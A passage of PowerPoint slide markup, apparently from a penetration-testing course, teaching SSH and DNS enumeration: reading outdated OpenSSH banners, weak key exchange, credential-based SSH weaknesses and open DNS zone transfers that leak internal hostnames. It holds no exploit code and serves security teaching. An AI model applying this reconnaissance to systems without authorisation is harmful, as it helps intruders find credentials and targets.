          <p:cNvPr id="6" name="Image 0" descr="img/t_ssh.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1481328"/>
            <a:ext cx="6400800" cy="3282696"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178040" y="1554480"/>
            <a:ext cx="4453128" cy="3291840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The banner is the finding. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>OpenSSH 4.7p1 tells you the box has not been updated since 2008.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>You are not exploiting sshd. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Remote code execution in OpenSSH is rare and expensive. You are here for credentials.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Old key exchange. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>If you must pass -oKexAlgorithms to connect, the host is very old.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>ssh-audit </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>grades the ciphers and is what you paste into the report.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="5029200"/>
            <a:ext cx="11091672" cy="1097280"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5833"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1B1033"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="5230368"/>
            <a:ext cx="10515600" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Where SSH breaks:  </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>reused passwords, root login allowed, private keys left in a readable home directory, and authorized_keys files nobody has reviewed since the last employee left.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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03 / ENUMERATION</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DNS   port 53</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27</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="1444752"/>
            <a:ext cx="11064240" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>DNS is the phone book of the network. If a name server is configured badly it hands you every internal hostname, without you touching a single one of them.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 0" descr="img/t_dns.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="2057400"/>
            <a:ext cx="6400800" cy="3054096"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7269480" y="2103120"/>
            <a:ext cx="4389120" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>WHY THIS ONE MATTERS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7269480" y="2468880"/>
            <a:ext cx="4361688" cy="2560320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A zone transfer is a feature. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A backup name server needs a full copy of the zone, so the protocol allows it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The mistake is who may ask. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>It should answer the backup server only. Often it answers anyone.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Names are intelligence. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>backup, jenkins, dev and vpn tell you where to spend the rest of your day.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="5212080"/>
            <a:ext cx="5486400" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>RECORD TYPES WORTH KNOWING</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="5541264"/>
            <a:ext cx="2103120" cy="603504"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9091"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713232" y="5614416"/>
            <a:ext cx="1737360" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713232" y="5852160"/>
            <a:ext cx="1874520" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>name to IPv4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788920" y="5541264"/>
            <a:ext cx="2103120" cy="603504"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9091"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2953512" y="5614416"/>
            <a:ext cx="1737360" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>MX</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2953512" y="5852160"/>
            <a:ext cx="1874520" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>mail server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5029200" y="5541264"/>
            <a:ext cx="2103120" cy="603504"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9091"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5193792" y="5614416"/>
            <a:ext cx="1737360" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
